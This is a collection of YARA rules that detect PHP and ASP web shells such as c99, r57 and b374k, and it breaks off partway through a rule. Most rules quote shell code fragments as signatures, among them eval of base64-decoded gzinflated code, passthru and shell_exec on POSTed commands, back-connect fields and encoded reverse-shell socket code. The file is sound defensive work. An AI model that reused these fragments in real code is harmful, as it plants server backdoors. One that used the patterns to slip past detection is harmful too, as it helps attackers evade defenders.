_w_php_php_wacking_php_php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "9c5bb5e3a46ec28039e8986324e42792" hash2 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = "\"<td> <a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur" $s2 = "c99sh_sqlquery" condition: 1 of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9" hash4 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA" $s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec" condition: 1 of them } rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php { meta: description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "911195a9b7c010f61b66439d9048f400" hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f" hash3 = "eed14de3907c9aa2550d95550d1a2d5f" hash4 = "817671e1bdc85e04cc3440bbd9288800" strings: $s0 = "echo sr(15,\"<b>\".$lang[$language.'_text" $s1 = ".$arrow.\"</b>\",in('text','" condition: 2 of them } rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php { meta: description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "911195a9b7c010f61b66439d9048f400" hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f" strings: $s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword $s1 = "$name='ec371748dc2da624b35a4f8f685dd122'" $s2 = "rst.void.ru" condition: 3 of them } rule _r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php { meta: description = "Semi-Auto-generated - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "8023394542cddf8aee5dec6072ed02b5" hash2 = "eed14de3907c9aa2550d95550d1a2d5f" hash3 = "817671e1bdc85e04cc3440bbd9288800" strings: $s0 = "echo ws(2).$lb.\" <a" $s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']" $s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l" condition: 2 of them } rule _wacking_php_php_1_SpecialShell_99_php_php_c100_php { meta: description = "Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "9c5bb5e3a46ec28039e8986324e42792" hash1 = "44542e5c3e9790815c49d5f9beffbbf2" hash2 = "09609851caa129e40b0d56e90dfc476c" hash3 = "38fd7e45f9c11a37463c3ded1c76af4c" strings: $s0 = "if(eregi(\"./shbd $por\",$scan))" $s1 = "$_POST['backconnectip']" $s2 = "$_POST['backcconnmsg']" condition: 1 of them } rule _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php { meta: description = "Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f" hash2 = "8023394542cddf8aee5dec6072ed02b5" hash3 = "eed14de3907c9aa2550d95550d1a2d5f" hash4 = "817671e1bdc85e04cc3440bbd9288800" strings: $s1 = "if(rmdir($_POST['mk_name']))" $s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>" $s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell" condition: 2 of them } rule _w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "9c5bb5e3a46ec28039e8986324e42792" hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9" hash3 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi" $s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu" $s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd" condition: 1 of them } rule _webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php { meta: description = "Semi-Auto-generated - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7" hash1 = "12911b73bc6a5d313b494102abcf5c57" hash2 = "13f5c7a035ecce5f9f380967cf9d4e92" strings: $s0 = "return $type . $owner . $group . $other;" fullword $s1 = "$owner = ($mode & 00400) ? 'r' : '-';" fullword condition: all of them } rule multiple_php_webshells { meta: description = "Semi-Auto-generated - from files multiple_php_webshells" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "911195a9b7c010f61b66439d9048f400" hash2 = "be0f67f3e995517d18859ed57b4b4389" hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f" hash4 = "8023394542cddf8aee5dec6072ed02b5" hash5 = "eed14de3907c9aa2550d95550d1a2d5f" hash6 = "817671e1bdc85e04cc3440bbd9288800" hash7 = "7101fe72421402029e2629f3aaed6de7" hash8 = "f618f41f7ebeb5e5076986a66593afd1" strings: $s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI" $s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0" $s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg" condition: 2 of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" strings: $s0 = "<b>Dumped! Dump has been writed to " $s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st" $s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive" condition: 1 of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "d8ae5819a0a2349ec552cbcf3a62c975" hash4 = "9e9ae0332ada9c3797d6cee92c2ede62" strings: $s0 = "@ini_set(\"highlight" fullword $s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword $s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword condition: 2 of them } rule _GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php { meta: description = "Semi-Auto-generated - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "be0f67f3e995517d18859ed57b4b4389" hash1 = "4a44d82da21438e32d4f514ab35c26b6" hash2 = "f618f41f7ebeb5e5076986a66593afd1" strings: $s2 = "echo $uname.\"</font><br><b>\";" fullword $s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword $s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()" condition: 2 of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "d8ae5819a0a2349ec552cbcf3a62c975" hash4 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = "c99ftpbrutecheck" $s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword $s2 = "$fqb_lenght = $nixpwdperpage;" fullword $s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword condition: 2 of them } rule _w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "9c5bb5e3a46ec28039e8986324e42792" hash2 = "d8ae5819a0a2349ec552cbcf3a62c975" hash3 = "9e9ae0332ada9c3797d6cee92c2ede62" hash4 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = "$sqlquicklaunch[] = array(\"" $s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<" condition: all of them } rule _antichat_php_php_Fatalshell_php_php_a_gedit_php_php { meta: description = "Semi-Auto-generated - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "128e90b5e2df97e21e96d8e268cde7e3" hash1 = "b15583f4eaad10a25ef53ab451a4a26d" hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78" strings: $s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword $s1 = "if($action==\"phpeval\"){" fullword $s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword $s3 = "$dir=getcwd().\"/\";" fullword condition: 2 of them } rule _c99shell_v1_0_php_php_c99php_SsEs_php_php { meta: description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "d8ae5819a0a2349ec552cbcf3a62c975" hash1 = "9e9ae0332ada9c3797d6cee92c2ede62" hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9" strings: $s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword condition: 1 of them } rule _Crystal_php_nshell_php_php_load_shell_php_php { meta: description = "Semi-Auto-generated - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "fdbf54d5bf3264eb1c4bff1fac548879" hash1 = "4a44d82da21438e32d4f514ab35c26b6" hash2 = "0c5d227f4aa76785e4760cdcff78a661" strings: $s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword $s1 = "$dires = $dires . $directory;" fullword $s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword condition: 2 of them } rule _nst_php_php_cybershell_php_php_img_php_php_nstview_php_php { meta: description = "Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "ddaf9f1986d17284de83a17fe5f9fd94" hash1 = "ef8828e0bc0641a655de3932199c0527" hash2 = "17a07bb84e137b8aa60f87cd6bfab748" hash3 = "4745d510fed4378e4b1730f56f25e569" strings: $s0 = "@$rto=$_POST['rto'];" fullword $s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword $s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword condition: 2 of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "433706fdc539238803fd47c4394b5109" hash4 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":" $s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword condition: all of them } rule _c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php { meta: description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "d8ae5819a0a2349ec552cbcf3a62c975" hash1 = "9e9ae0332ada9c3797d6cee92c2ede62" hash2 = "44542e5c3e9790815c49d5f9beffbbf2" hash3 = "d089e7168373a0634e1ac18c0ee00085" hash4 = "38fd7e45f9c11a37463c3ded1c76af4c" strings: $s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword condition: all of them } rule multiple_php_webshells_2 { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "d8ae5819a0a2349ec552cbcf3a62c975" hash4 = "9e9ae0332ada9c3797d6cee92c2ede62" hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9" hash6 = "09609851caa129e40b0d56e90dfc476c" hash7 = "671cad517edd254352fe7e0c7c981c39" strings: $s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I" $s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma" $s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword condition: all of them } rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php { meta: description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2" hash1 = "3ca5886cd54d495dc95793579611f59a" hash2 = "9c5bb5e3a46ec28039e8986324e42792" hash3 = "44542e5c3e9790815c49d5f9beffbbf2" hash4 = "09609851caa129e40b0d56e90dfc476c" strings: $s0 = "if ($total === FALSE) {$total = 0;}" fullword $s1 = "$free_percent = round(100/($total/$free),2);" fullword $s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword $s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword condition: 2 of them } rule _r577_php_php_r57_php_php_spy_php_php_s_php_php { meta: description = "Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "0714f80f35c1fddef1f8938b8d42a4c8" hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f" hash2 = "eed14de3907c9aa2550d95550d1a2d5f" hash3 = "817671e1bdc85e04cc3440bbd9288800" strings: $s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword $s2 = "'eng_text30'=>'Cat file'," fullword $s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword condition: 1 of them } rule _nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php { meta: description = "Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" super_rule = 1 hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6" hash1 = "d8ae5819a0a2349ec552cbcf3a62c975" hash2 = "9e9ae0332ada9c3797d6cee92c2ede62" hash3 = "f3ca29b7999643507081caab926e2e74" strings: $s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword $s1 = "$ret = posix_kill($pid,$sig);" fullword $s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword $s3 = "$i = $nixpasswd;" fullword condition: 2 of them } /* GIF Header webshell */ rule DarkSecurityTeam_Webshell { meta: description = "Dark Security Team Webshell" author = "Florian Roth" hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24" score = 50 strings: $s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii condition: 1 of them } rule GIFCloaked_Webshell { meta: description = "Looks like a webshell cloaked as GIF" author = "Florian Roth" hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24" score = 50 strings: $magic = { 47 49 46 38 } /* GIF8 ... */ $s0 = "input type" $s1 = "<%eval request" $s2 = "<%eval(Request.Item[" $s3 = "LANGUAGE='VBScript'" condition: ( $magic at 0 ) and ( 1 of ($s*) ) } rule PHP_Cloaked_Webshell_SuperFetchExec { meta: description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC" reference = "http://goo.gl/xFvioC" author = "Florian Roth" score = 50 strings: $s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);" condition: $s0 } /* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */ rule WebShell_RemExp_asp_php { meta: description = "PHP Webshells Github Archive - file RemExp.asp.php.txt" author = "Florian Roth" hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2" strings: $s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword $s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f" $s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword $s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword $s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> Name</td>" fullword condition: all of them } rule WebShell_dC3_Security_Crew_Shell_PRiV { meta: description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php" author = "Florian Roth" hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a" strings: $s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword $s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword $s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword $s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword $s16 = "echo base64_decode($images[$_GET['pic']]);" fullword $s20 = "if (isset($_GET['rename_all'])) {" fullword condition: 3 of them } rule WebShell_simattacker { meta: description = "PHP Webshells Github Archive - file simattacker.php" author = "Florian Roth" hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9" strings: $s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword $s4 = " Turkish Hackers : WWW.ALTURKS.COM <br>" fullword $s5 = " Programer : SimAttacker - Edited By KingDefacer<br>" fullword $s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword $s10 = " e-mail : kingdefacer@msn.com<br>" fullword $s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword $s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword $s20 = "$Comments=$_POST['Comments'];" fullword condition: 2 of them } rule WebShell_DTool_Pro { meta: description = "PHP Webshells Github Archive - file DTool Pro.php" author = "Florian Roth" hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353" strings: $s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront" $s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword $s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig" $s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword $s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword $s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword $s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite " $s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword condition: 3 of them } rule WebShell_ironshell { meta: description = "PHP Webshells Github Archive - file ironshell.php" author = "Florian Roth" hash = "d47b8ba98ea8061404defc6b3a30839c4444a262" strings: $s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword $s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST" $s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword $s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d" $s15 = "if(!is_numeric($_POST['timelimit']))" fullword $s16 = "if($_POST['chars'] == \"9999\")" fullword $s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword $s18 = "print shell_exec($command);" fullword condition: 3 of them } rule WebShell_indexer_asp_php { meta: description = "PHP Webshells Github Archive - file indexer.asp.php.txt" author = "Florian Roth" hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d" strings: $s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword $s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword $s2 = "<form action=\"?Gonder\" method=\"post\">" fullword $s4 = "<form action=\"?oku\" method=\"post\">" fullword $s7 = "var message=\"SaNaLTeRoR - " fullword $s8 = "nDexEr - Reader\"" fullword condition: 3 of them } rule WebShell_toolaspshell { meta: description = "PHP Webshells Github Archive - file toolaspshell.php" author = "Florian Roth" hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f" strings: $s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef" $s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword $s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword condition: 2 of them } rule WebShell_b374k_mini_shell_php_php { meta: description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php" author = "Florian Roth" hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143" strings: $s0 = "@error_reporting(0);" fullword $s2 = "@eval(gzinflate(base64_decode($code)));" fullword $s3 = "@set_time_limit(0); " fullword condition: all of them } rule WebShell_Sincap_1_0 { meta: description = "PHP Webshells Github Archive - file Sincap 1.0.php" author = "Florian Roth" hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c" strings: $s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword $s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword $s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword $s12 = "while (($ekinci=readdir ($sedat))){" fullword $s19 = "$deger2= \"$ich[$tampon4]\";" fullword condition: 2 of them } rule WebShell_b374k_php { meta: description = "PHP Webshells Github Archive - file b374k.php.php" author = "Florian Roth" hash = "04c99efd187cf29dc4e5603c51be44170987bce2" strings: $s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword $s6 = "// password (default is: b374k)" $s8 = "//******************************************************************************" $s9 = "// b374k 2.2" fullword $s10 = "eval(\"?>\".gzinflate(base64_decode(" condition: 3 of them } rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend { meta: description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php" author = "Florian Roth" hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44" strings: $s4 = " Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword $s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword $s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword $s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword $s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword $s19 = "$Comments=$_POST['Comments'];" fullword $s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword condition: 3 of them } rule WebShell_h4ntu_shell__powered_by_tsoi_ { meta: description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php" author = "Florian Roth" hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9" strings: $s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword $s13 = "$cmd = $_POST['cmd'];" fullword $s16 = "$uname = posix_uname( );" fullword $s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword $s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>" $s20 = "ob_end_clean();" fullword condition: 3 of them } rule WebShell_php_webshells_MyShell { meta: description = "PHP Webshells Github Archive - file MyShell.php" author = "Florian Roth" hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d" strings: $s3 = "<title>MyShell error - Access Denied</title>" fullword $s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword $s5 = "//A workdir has been asked for - we chdir to that dir." fullword $s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o" $s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword $s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword $s19 = "#every command you excecute." fullword $s20 = "<form name=\"shell\" method=\"post\">" fullword condition: 3 of them } rule WebShell_php_webshells_pws { meta: description = "PHP Webshells Github Archive - file pws.php" author = "Florian Roth" hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b" strings: $s6 = "if ($_POST['cmd']){" fullword $s7 = "$cmd = $_POST['cmd'];" fullword $s10 = "echo \"FILE UPLOADED TO $dez\";" fullword $s11 = "if (file_exists($uploaded)) {" fullword $s12 = "copy($uploaded, $dez);" fullword $s17 = "passthru($cmd);" fullword condition: 4 of them } rule WebShell_reader_asp_php { meta: description = "PHP Webshells Github Archive - file reader.asp.php.txt" author = "Florian Roth" hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931" strings: $s5 = "ster\" name=submit> </Font> <a href=mailto:mailbomb@hotmail" $s12 = " HACKING " fullword $s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: " $s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG" condition: 3 of them } rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 { meta: description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php" author = "Florian 